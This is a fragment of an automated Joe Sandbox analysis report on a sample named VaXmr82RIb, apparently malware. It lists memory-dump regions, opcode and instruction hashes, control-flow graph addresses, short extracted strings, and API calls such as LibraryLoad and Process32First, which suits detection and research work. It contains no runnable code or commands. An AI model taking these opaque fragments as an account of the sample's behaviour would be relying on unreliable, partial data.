                                                      • Opcode ID: 6cc2791541f1a1e5c958d5b8630caf71a382c34397714ff7ad7f29a32d663805
                                                      • Instruction ID: 40daa4c0a8625b6ad07aba5690a350cef0eb629c910ee4d47ea8e9e934c9edbf
                                                      • Opcode Fuzzy Hash: 6cc2791541f1a1e5c958d5b8630caf71a382c34397714ff7ad7f29a32d663805
                                                      • Instruction Fuzzy Hash: D8519FB6F101248FDB58CF6CC58059DF7E6BB8831075AC5AAD919EB351E631EC828BC4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d2e2454ada04412ff2ab3b5e5415038594ecb16863e3fd563852fee10d86b1cd
                                                      • Instruction ID: 6995409a521acdd5fb7930115fee6cf142f3b9b7eb086fe6c21fff997af759f9
                                                      • Opcode Fuzzy Hash: d2e2454ada04412ff2ab3b5e5415038594ecb16863e3fd563852fee10d86b1cd
                                                      • Instruction Fuzzy Hash: 6D516F75F011199FCB48DF5DE98099EF7F2EB98314B19856EE819EB350DA35AC02CB80
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 88fdfa2261942597e798f4cdfb585e1da6bbc1c1f57fbb87c574c41fafc03453
                                                      • Instruction ID: 080cc29e2b91549a97bfd167ccbb3a5544e1bef6cf0c6292e15d7234be22393e
                                                      • Opcode Fuzzy Hash: 88fdfa2261942597e798f4cdfb585e1da6bbc1c1f57fbb87c574c41fafc03453
                                                      • Instruction Fuzzy Hash: 7D51BE36F106298FCB14EF7CD89409AB7B6AB4825074A41AAD816EF390DB358C41CBC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e96b4c27d53d328207b402caff3b55d94176002c50c6081cc44fe1d64bea0407
                                                      • Instruction ID: a634c500334dbc4f6c93cb847a19e6728949a8e4ebee5a7e236fba886141df14
                                                      • Opcode Fuzzy Hash: e96b4c27d53d328207b402caff3b55d94176002c50c6081cc44fe1d64bea0407
                                                      • Instruction Fuzzy Hash: 6751BF36F106298FCB58EF7DC89449EB7B6AB8825074A416AD816FF390DB359C41CBC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eaec47b1cd608115c090bd90066e7b7fefd5c790acd5c709bab8940193c89bde
                                                      • Instruction ID: b01b852d768b1cbbd9da2968968a6163b76e0723792ed7e431fc0354d3a7af8a
                                                      • Opcode Fuzzy Hash: eaec47b1cd608115c090bd90066e7b7fefd5c790acd5c709bab8940193c89bde
                                                      • Instruction Fuzzy Hash: 6541F533E156698FC7258F6CC8905A9BBF6AF9525470A81EBDC05EF392D2308C09CBD0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c6035378750f9a6466ac0eb633eef3322cba5200a6477f2a4c7c1f7a8087bae1
                                                      • Instruction ID: 912ea8658c603e37cd00c460377e47b1bcc8d5551e0b20da66b41dc0c87cbc7f
                                                      • Opcode Fuzzy Hash: c6035378750f9a6466ac0eb633eef3322cba5200a6477f2a4c7c1f7a8087bae1
                                                      • Instruction Fuzzy Hash: 0C51F976F102249FCB18DFA8D9504AEBBA6EB84310716856EDC4AEB341DB34DD06CBC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30085838938.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7b30000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ac42d7012e88e029d89f160a06cb94c5ed16e4d8498b7891691d7868f3b38417
                                                      • Instruction ID: 8e306e735e61c9301cc6d26cd283e8d22c4a7d0c2ed5ab3926f8d5f79aa39ec1
                                                      • Opcode Fuzzy Hash: ac42d7012e88e029d89f160a06cb94c5ed16e4d8498b7891691d7868f3b38417
                                                      • Instruction Fuzzy Hash: F1518E72F101248FCB58CF5CC980999F7E6BB8871075AC5AAD909EB345E631EC92CBC4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 46309243563007daf7b4588707f4701a334c20e06f41d25b146cbd412578e1ab
                                                      • Instruction ID: 2723e95f1d2949d3e682cf6ffd61c8e4c2382f869b297b00870901bb351a99fb
                                                      • Opcode Fuzzy Hash: 46309243563007daf7b4588707f4701a334c20e06f41d25b146cbd412578e1ab
                                                      • Instruction Fuzzy Hash: 4A413937E006694FCB05CF58CD9159BBB62BFC8211B2A456BEC48EB390E6719D11CBC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: acb218d516526ca23a8ee6b80ee610b0f4084f029ec30c7127e83a2440017d2b
                                                      • Instruction ID: 64df23633093e4a0c69ad4c5a6d7636cabe6ba22ae0bb190500acf93e209263f
                                                      • Opcode Fuzzy Hash: acb218d516526ca23a8ee6b80ee610b0f4084f029ec30c7127e83a2440017d2b
                                                      • Instruction Fuzzy Hash: 5341F373F015294FCB18CAADC8815AEFBE2ABD8350B1A416EAC08FB350E6345D05CBC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d5a49f4aef6c8f21093817f8be75517f4993bb6da4cca206dd5796e3346c653d
                                                      • Instruction ID: d4c38f7ef7ab99ee27ad954d25087da3a5e6e7f5c2f400b13e91a2a3bb236c29
                                                      • Opcode Fuzzy Hash: d5a49f4aef6c8f21093817f8be75517f4993bb6da4cca206dd5796e3346c653d
                                                      • Instruction Fuzzy Hash: EA312733E1163A4FC724CE6DC8900EAB7B69B9926070E42ABDC05EB791D5308D49CBD0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 652c969d721b04a7e686b42e4c15d721e119c782c0afad4114586ad02a0d6404
                                                      • Instruction ID: bff307fd9390246a7fe14478f7e903bd7550dee07e2b6022ae251bfd48515a1d
                                                      • Opcode Fuzzy Hash: 652c969d721b04a7e686b42e4c15d721e119c782c0afad4114586ad02a0d6404
                                                      • Instruction Fuzzy Hash: A641F573F115394B8B18CA6DCC415AAF7E3ABD8750B1A416EAC08FB350E6749D45CBC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf290ac026e90b6715f289f2b14f62b8bb5a93d967584d29d2925a0b6d4b4f7e
                                                      • Instruction ID: 2b9d13aa68d71d3b482c93abee4df79d2b0556fd09aea3de045e033509c67376
                                                      • Opcode Fuzzy Hash: bf290ac026e90b6715f289f2b14f62b8bb5a93d967584d29d2925a0b6d4b4f7e
                                                      • Instruction Fuzzy Hash: 3A31D677F015294BCB04CE59C94159FF763BBC8252F2A852AEC19EB380EB719D118BC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd85b0c5b2f0edcf3b6e002c800f4fc5c65fd6ac5892fd1180472506231cfd4a
                                                      • Instruction ID: 840d696df5a5679814dacfcc122e58bbbaf51d10e73ba4e61c560ca7000cef73
                                                      • Opcode Fuzzy Hash: dd85b0c5b2f0edcf3b6e002c800f4fc5c65fd6ac5892fd1180472506231cfd4a
                                                      • Instruction Fuzzy Hash: 5D310533F1053A4BD724DE6DC8905AAF7E79BD82A070A82AA9C09FB741D6319D05CBD0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 5453 362139f-36213b4 5454 36213b6-36213c9 5453->5454 5455 362142b 5453->5455 5460 36213e3-36213f2 5454->5460 5461 36213cb-36213d1 5454->5461 5456 362142c-3621430 5455->5456 5457 3621431-3621436 5456->5457 5458 362141a-3621420 5456->5458 5463 3621438-362143c 5457->5463 5462 3621422-3621428 5458->5462 5458->5463 5460->5458 5465 36213d3 5461->5465 5466 36213d5-36213e1 5461->5466 5462->5456 5467 362142a 5462->5467 5468 3621456-3621460 5463->5468 5469 362143e-3621444 5463->5469 5465->5460 5466->5460 5467->5463 5474 3621467-3621469 5468->5474 5470 3621446 5469->5470 5471 3621448-3621454 5469->5471 5470->5468 5471->5468
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $jq$$jq$$jq$$jq
                                                      • API String ID: 0-2428501249
                                                      • Opcode ID: e748290902f886b965280e62755b0098006fd9a50b7b2ac603d5b24c90a2131a
                                                      • Instruction ID: ec2dd675f91fece83ca781368e74725e7526cb3c38b20b59a52a763f3ea892fb
                                                      • Opcode Fuzzy Hash: e748290902f886b965280e62755b0098006fd9a50b7b2ac603d5b24c90a2131a
                                                      • Instruction Fuzzy Hash: E9110A71B095328FC738C76C54206A79BE7AFD722473A857AC84896359CA618C838BE5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 5476 3622418-362244d 5478 3622467-3622469 5476->5478 5479 362244f-3622455 5476->5479 5482 3622483-3622486 5478->5482 5483 362246b-3622471 5478->5483 5480 3622457 5479->5480 5481 3622459-3622465 5479->5481 5480->5478 5481->5478 5487 362248d-3622492 5482->5487 5484 3622473 5483->5484 5485 3622475-3622481 5483->5485 5484->5482 5485->5482
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $jq$$jq$$jq$$jq
                                                      • API String ID: 0-2428501249
                                                      • Opcode ID: 70c86b8ce54bfa590cb2da3918b319680ae41e0190d035cc9996189846c3c0a5
                                                      • Instruction ID: 88c248964a06343a5300b8a6b4b3fdb1cc9ba011440d9b8faee713a807330ffd
                                                      • Opcode Fuzzy Hash: 70c86b8ce54bfa590cb2da3918b319680ae41e0190d035cc9996189846c3c0a5
                                                      • Instruction Fuzzy Hash: 76016711B0E7A64FD32686699C70155AF729F9351031F05E7C440DF397D6548C0587A3

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 5489 3622e90-3622e9b 5490 3622eb3-3622eb7 5489->5490 5491 3622e9d-3622ea3 5489->5491 5494 3622ed1-3622ed7 5490->5494 5495 3622eb9-3622ebf 5490->5495 5492 3622ea7-3622eb1 5491->5492 5493 3622ea5 5491->5493 5492->5490 5493->5490 5498 3622ed9-3622edb 5494->5498 5499 3622edd-3622edf 5494->5499 5496 3622ec3-3622ecf 5495->5496 5497 3622ec1 5495->5497 5496->5494 5497->5494 5500 3622eed-3622ef0 5498->5500 5504 3622ee2 call 89fb9ee 5499->5504 5505 3622ee2 call 89fb888 5499->5505 5506 3622ee2 call 89fb878 5499->5506 5507 3622ee2 call 89fbd07 5499->5507 5508 3622ee2 call 89fbb90 5499->5508 5503 3622ee4-3622ee6 5503->5500 5504->5503 5505->5503 5506->5503 5507->5503 5508->5503
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'jq$4'jq$LRjq$LRjq
                                                      • API String ID: 0-3171842408
                                                      • Opcode ID: 1cc01b7fc9808911d5d835694682e3ff451453ef4f9ab0eb565fc071d87f2161
                                                      • Instruction ID: e7caabe4286f8be8157579256efc7279dacaa3cdbc7824a6697b747bd9ce0f26
                                                      • Opcode Fuzzy Hash: 1cc01b7fc9808911d5d835694682e3ff451453ef4f9ab0eb565fc071d87f2161
                                                      • Instruction Fuzzy Hash: C7F0BB31B009364BC769C51D813053FBFAAAFCD61032A4879D449DF364DB308C425B81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hnq$c6n
                                                      • API String ID: 0-1496566816
                                                      • Opcode ID: b488362001560d83b8cef173df3af39212f6c6353da03d75e62de89a2a1a915e
                                                      • Instruction ID: 9b2637c465fbafc4bff67a74ce633e2bc0cce0d53921ffa6a41f5d6d1e3f667f
                                                      • Opcode Fuzzy Hash: b488362001560d83b8cef173df3af39212f6c6353da03d75e62de89a2a1a915e
                                                      • Instruction Fuzzy Hash: 9041043BB146750F8749E67CB8A01BDAB96EBC5120309456FD44AEF340DE189C0687D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $jq$$jq
                                                      • API String ID: 0-3720491408
                                                      • Opcode ID: 15d9f026fa6eb968b5507030e2d1b26a84c145833fee6cdb2a0abef4ef270596
                                                      • Instruction ID: e130cc68c9e582a97239528e186e685d35b770f3a2a2a49f62cb47ba304366d4
                                                      • Opcode Fuzzy Hash: 15d9f026fa6eb968b5507030e2d1b26a84c145833fee6cdb2a0abef4ef270596
                                                      • Instruction Fuzzy Hash: 58110A32F08A298BC724DF698990577BBBAEFC721071A456BDC0597314DB399C41CFA2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: XXjq$XXjq
                                                      • API String ID: 0-2797584762
                                                      • Opcode ID: f5bed4410077f7e048b6bdad8ab497380b5a8d9316a3f132a30231a716667b84
                                                      • Instruction ID: 5c837e1c719e637b4ed867d2d1572615e1d99f8081788eed5ddbbe08e37174bb
                                                      • Opcode Fuzzy Hash: f5bed4410077f7e048b6bdad8ab497380b5a8d9316a3f132a30231a716667b84
                                                      • Instruction Fuzzy Hash: F4018422E0D7A55FC7269B2E4860626AFB69FC751032F85FBC046CB356D9208C46CB93
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $jq$$jq
                                                      • API String ID: 0-3720491408
                                                      • Opcode ID: f262ecd778dd9440de099968c3571e36542d47d3ddc2543eddfbac79c0130f56
                                                      • Instruction ID: 09fb96241399922faa78bc420db9709229e3473574c42893f8893c86f66c191a
                                                      • Opcode Fuzzy Hash: f262ecd778dd9440de099968c3571e36542d47d3ddc2543eddfbac79c0130f56
                                                      • Instruction Fuzzy Hash: BD01DB72B046654B9BA5CA5944714BBBEBBABCA210326483FD405CB714EF728C018B91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ojq$Hnq
                                                      • API String ID: 0-4162186043
                                                      • Opcode ID: ce495dd8316e969b557eafbf5a1633dd55ae43648ba14773fa030bae6896dd19
                                                      • Instruction ID: 266d168e83aebb7216dec06d1c8cefcb27f2440151e92a0a2186acb5d223bfd9
                                                      • Opcode Fuzzy Hash: ce495dd8316e969b557eafbf5a1633dd55ae43648ba14773fa030bae6896dd19
                                                      • Instruction Fuzzy Hash: 8B012832B042984FC318D6BEDC5455BBBF6AFC525071802BBE809DF390CA259D06C7A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $jq$$jq
                                                      • API String ID: 0-3720491408
                                                      • Opcode ID: cec3695e2d7edd76b67ad56f5e593099c6dcb29d06bd4c03c5bbeb0fcec35878
                                                      • Instruction ID: 8711765e1bceae83abbf41033b60d143b6978fb9251d1607f61603bbc1f83eb7
                                                      • Opcode Fuzzy Hash: cec3695e2d7edd76b67ad56f5e593099c6dcb29d06bd4c03c5bbeb0fcec35878
                                                      • Instruction Fuzzy Hash: D801F9A3B0D6654FC726C71C84641676FF6DFD721071E40E7D046EB356D9249C01CB92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: XXjq$XXjq
                                                      • API String ID: 0-2797584762
                                                      • Opcode ID: 47dee873827774ec86bf21548f7bdd9c9c0f3256f1b4163f291420002e7e5049
                                                      • Instruction ID: fbff7329bb31f3c2cddbb5002b88efa8de4434c6662ff8fda719cc027ca37901
                                                      • Opcode Fuzzy Hash: 47dee873827774ec86bf21548f7bdd9c9c0f3256f1b4163f291420002e7e5049
                                                      • Instruction Fuzzy Hash: 9FF09622B0D3E44FC316A768547452A6FB5DFD7220B5F05EBE185CB296C9188C0487A2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $jq$$jq
                                                      • API String ID: 0-3720491408
                                                      • Opcode ID: 98c2fed0369632d5fd1bcb84d40c47aef67ae059bca2379b3bde6ef2381764b7
                                                      • Instruction ID: 556cea9165a4d9d0b5339f0871ed3e639cdb52666b7b79cd7c0aded71dc48d94
                                                      • Opcode Fuzzy Hash: 98c2fed0369632d5fd1bcb84d40c47aef67ae059bca2379b3bde6ef2381764b7
                                                      • Instruction Fuzzy Hash: 92F06261E0DBA54FC726872D59201156F765F9711031E81FB8845DB256D9344C828792
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $jq$$jq
                                                      • API String ID: 0-3720491408
                                                      • Opcode ID: e79559ee91f768093c64e4e8c3a8d9c7fc2f094e9d0290cc18ddf5f9b5fcb3b1
                                                      • Instruction ID: e8930f53f1ba20a7bf82b1c6a8989971bf88aab4b2b37b6161e8c26d6a134238
                                                      • Opcode Fuzzy Hash: e79559ee91f768093c64e4e8c3a8d9c7fc2f094e9d0290cc18ddf5f9b5fcb3b1
                                                      • Instruction Fuzzy Hash: 0DF0E263B0E6A05FC3369A1A5C7056BAEBAEBD761035E00EB9944DB392D9148C05C3A2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $jq$$jq
                                                      • API String ID: 0-3720491408
                                                      • Opcode ID: a0f9c903e1291d7141e22fb542f1429f30f799d2710e4691aa66ab0cc44eaba1
                                                      • Instruction ID: 0b56dc746d0b65072588b3c231005fc8fe66c2f7b58ae410c29ab30483170820
                                                      • Opcode Fuzzy Hash: a0f9c903e1291d7141e22fb542f1429f30f799d2710e4691aa66ab0cc44eaba1
                                                      • Instruction Fuzzy Hash: E1F06D10B1E7E54FC73B86285530127AF726F8311932F40EBD080CF2A7C9658C46C7A2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: tU8m$#8m
                                                      • API String ID: 0-465497804
                                                      • Opcode ID: d6de74a4ff8a18230929290f87ebb04202c2008fe57dd315a533fd34cbc620ed
                                                      • Instruction ID: 69239ac0b78d12844846ed9835905a1aceb54daf8a6de2adbe65459f94d84d96
                                                      • Opcode Fuzzy Hash: d6de74a4ff8a18230929290f87ebb04202c2008fe57dd315a533fd34cbc620ed
                                                      • Instruction Fuzzy Hash: 5CF02E4970DAE48FC75383786470058BFB18E8300030B46DBC09ACF2ABD500CD49CBA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $jq$$jq
                                                      • API String ID: 0-3720491408
                                                      • Opcode ID: b7c8fd0df620a647f951b752ea91dcfa26ed2b2dfa7995270bf400ccf77f1ace
                                                      • Instruction ID: c008561cae718c99e0d6df404e4657fecc3018136439677071c6522125f9bb12
                                                      • Opcode Fuzzy Hash: b7c8fd0df620a647f951b752ea91dcfa26ed2b2dfa7995270bf400ccf77f1ace
                                                      • Instruction Fuzzy Hash: 51F0F811A1F7E64FC7278728282056A6FB65E9751031F05D7D481DF297D9548C0A87E2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $jq$$jq
                                                      • API String ID: 0-3720491408
                                                      • Opcode ID: 5b60c2cd61a559d0544702eddbdf6eab4461eccfe7d4fb07d8cf2a0c848003d6
                                                      • Instruction ID: 8f8d042c3ed92d70830ef74824e60203f54e41f01ccb62de3172fd785ea8d4c1
                                                      • Opcode Fuzzy Hash: 5b60c2cd61a559d0544702eddbdf6eab4461eccfe7d4fb07d8cf2a0c848003d6
                                                      • Instruction Fuzzy Hash: B9F0A902B4E2E00FC62782682C300AA6FB21F8356031E01DBD880DB697D8088C4A83A2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'jq$4'jq
                                                      • API String ID: 0-1204115232
                                                      • Opcode ID: 59c8dd4da77100250d0b0ace325299bd3ecbe1e17698eb8b68ce1f00b31822e7
                                                      • Instruction ID: 728418a12d4e2d938d5852ec1dadfce9398346b8ececea518e9d20ea51208109
                                                      • Opcode Fuzzy Hash: 59c8dd4da77100250d0b0ace325299bd3ecbe1e17698eb8b68ce1f00b31822e7
                                                      • Instruction Fuzzy Hash: B3D0A734B519298F870CDA9DE130436BBE7BFC961032540BAD409CB774DF31DC018A45
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 9fb2601c0f58e84e53ae2b7dd1e4f6daed57ca8cc01a2cbe78723ce7e5c3a32c
                                                      • Instruction ID: caa7b8c90e2e72cdfaa50b1248606a588c51251b2c79f2128e2c5bb332c29c18
                                                      • Opcode Fuzzy Hash: 9fb2601c0f58e84e53ae2b7dd1e4f6daed57ca8cc01a2cbe78723ce7e5c3a32c
                                                      • Instruction Fuzzy Hash: DB718FB1E002548FCB14DFA9C484A9EFBF2EF88310F158569E819EB351DB75AC42CB81
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 8f20dbfa3bf969cd9c564b8ffe30f0dbfa89be1f7f5be097f4af469f33e24c74
                                                      • Instruction ID: d8d05eff6d650bb21f992cdffc978990d0bb487a1edee3ee0fc148d00aabf12c
                                                      • Opcode Fuzzy Hash: 8f20dbfa3bf969cd9c564b8ffe30f0dbfa89be1f7f5be097f4af469f33e24c74
                                                      • Instruction Fuzzy Hash: 7E418BB0C057888FDB11CFA9C88579EBFF2AF49314F18846AE854EB291D7749845CB92
                                                      APIs
                                                      • Process32First.KERNEL32(?,?), ref: 080E199E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false
